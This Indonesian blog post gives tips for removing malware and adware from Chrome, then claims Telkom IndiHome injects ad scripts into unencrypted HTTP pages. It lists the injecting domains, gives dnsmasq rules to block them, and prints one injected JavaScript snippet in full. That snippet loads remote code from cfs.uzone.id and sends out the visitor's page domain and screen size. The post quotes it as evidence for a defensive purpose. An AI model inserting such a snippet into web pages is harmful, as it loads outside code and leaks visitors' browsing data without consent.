January 3, 2019

Cara Mengatasi Google Chrome Terkena Virus - Menghapus Malware & Adware Telkom

January 3, 2019

Sebelum berbagi tips "Cara Mengatasi Google Chrome Terkena Virus: Menghapus Malware & Adware" ini , CB sudah berbagi Cara Mengatasi Google Chrome Error 'Aw Snap' Tak Bisa Buka Halaman Web.

Posting ini dibuat karena CB baru saja mengalaminya, berdasarkan "laporan" antivirus Avast! yang dipasang di komputer:

Cara Mengatasi Google Chrome Terkena Virus - Menghapus Malware & Adware

Notifikasi itu muncul setiap kali membuka halaman baru http (not secure). Jika buka web yang https aman-aman saja.

Di Google Product Forum juga ada yang bertanya: "Kenapa Google Chrome saya ada iklan yang tidak baik? Bagaimana cara memulihkannya?"

Ada yang menjawab, sepertinya perangkat kamu terkena virus/malware yang mengubah beranda dan situs pencarian kamu.

Kami sarankan agar kamu menggunakan antivirus untuk menghapus virus yang ada di perangkat kamu.

Jika kamu tidak berhasil menghapus malware dengan menggunakan Alat Pembersih Chrome untuk Windows,

Kamu juga bisa coba gunakan pembersih malware https://www.malwarebytes.com/ untuk mengatasi masalah kamu.

Atau menggunakan cara berikut,
1. Menghapus perangkat lunak yang memengaruhi Chrome
2. Membuang munculan, pengalihan, dan perangkat lunak perusak lainnya

Selain itu, coba ubah kembali mesin penelusuran menjadi Google dengan panduan Menjadikan Google sebagai mesin telusur default.

Jangan Lupa untuk me-restart computer kamu setelah melakukan scan malware tsb.

CB buka Panduan Chrome cara menghapus malware, pop-up & iklan yang tidak diinginkan

Disebutkan, jika beberapa masalah di bawah ini muncul di Chrome, artinya ada software yang tidak diinginkan atau malware terinstal di komputer Anda.
  • Iklan pop-up dan tab baru yang tidak dapat ditutup
  • Halaman beranda atau mesin telusur Chrome selalu berubah tanpa izin Anda
  • Ekstensi Chrome atau toolbar yang tidak diinginkan terus muncul
  • Browsing dibajak dan diarahkan ke halaman atau iklan yang tidak dikenal
  • Peringatan tentang virus atau perangkat yang terinfeksi

Kita disarankan menghindari software yang tidak diinginkan dengan hanya mendownload file atau membuka situs yang terjamin keamanannya.

Kita bisa memeriksa malware secara manual. Caranya:
  1. Buka Chrome.
  2. Di kanan atas, klik Lainnya  > Setelan.
  3. Di bagian bawah, klik Lanjutan.
  4. Di bagian “Setel ulang dan bersihkan”, klik Bersihkan komputer.
  5. Klik Cari.

Jika diminta untuk menghapus software yang tidak diinginkan, klik Hapus.

Jika Anda menghapus program yang tidak diinginkan atau menyetel ulang setelan browser, mungkin beberapa ekstensi perlu diaktifkan kembali. 
Untuk mengaktifkan ekstensi, di kanan atas, klik Lainnya  > Fitur Lainnya > Ekstensi.

Ketika CB melakukan saran di atas, usai klik Cari (Find), hasilnya: "No harmful software found". Walah, lalu apa dong masalahnya? Avast bilang malware itu adanya di Chrome kok!

Kerjaan Telkom

Oh.. rupanya ini "ulah Telkom!"

Di forum Github terungkap, Telkom menginjeksi atau menyisipkan script. Ini daftarnya:

Daftar DOMAIN Internet Positif Telkom Indihome
  1. a01.uadexchange.com
  2. cdn.uzone.id
  3. cdn3.uzone.id
  4. cfs.uzone.id
  5. csf.uzone.id
  6. d01.notifa.info
  7. d31qbv1cthcecs.cloudfront.net
  8. d5nxst8fruw4z.cloudfront.net
  9. expose.uzone.id
  10. kendedes.uzone.id
  11. mercusuar.uzone.id
  12. p01.notifa.info
  13. p02.notifa.info
  14. p03.notifa.info
  15. p05.notifa.info
  16. usearch.co.id
  17. welcome.indihome.co.id
  18. upoint.id
  19. uzone.id
Untuk Untuk memblokir domain/subdomain tambahkan di dnsmasq.conf
address=/notifa.info/0.0.0.0 
address=/uzone.id/0.0.0.0

Script JS
Ini contoh script yang diinject ke http:

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHa6dUEiP6K%2fc5C582CL4NjpNgssKlLXmbTBE8IzDXCSPaiFHvyt8Q5fsYRny8X3ds6Lr7ToQwJBBAp5P%2bjKK12yr0FxrJb1ixNQVSm4FoVHOKcl3FNknXhjy%2bbVesNHJhD0cCTqdRhNvFS0F6iEXZjxMPE3QuLIQu%2frXcHuCJy3hLU4QFreC0HijsnOoLN%2ftyF0wyfyQL9NHY5W5Br2BHrjRKwDTSCJyVRi2MgeTRvJMZVrSHP%2fCKKzZJVTdtpmz9FQNiKCuhOcpWNNB2wEs1InhywhlXi%2bg%2fLs%2fI2ie5DhFiM%2fgiztMMQzXL11mHZirYErQELDIzGuYbIPcenKjW9OvxhUTTu%2bhOUc1nVkHoQAGhL0XfVqhaDPXofJbg9VGJdSA3sUnqqb%2fETChCJuhAL772tWxEYNBTEEb4lmYvGTg9WtXovN8WJhpghbYXxaRdpGeF77EkYtES3Fgvx3BJKDBSVCoLZ9Im4O5XCwtGWuPTsZfC8EiyYqCTAWPdaoqalbgI0gmD31qSGRwIq03O%2f2JQPFAx6bGaHg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

Solusinya, gunakan DNSCrypt atau bagi pemilik website gunakan SSL (https) biar ngga bisa di inject oleh Telkom.

Avast! juga sudah memblokirnya dengan "connection aborted". (www.contohblog.com).*

Previous
« Prev Post
Author Image

CB Blogger

Recommended Posts

Related Posts

Show comments
Hide comments

No comments on Cara Mengatasi Google Chrome Terkena Virus - Menghapus Malware & Adware Telkom

Post a Comment

Contact Form

Name

Email *

Message *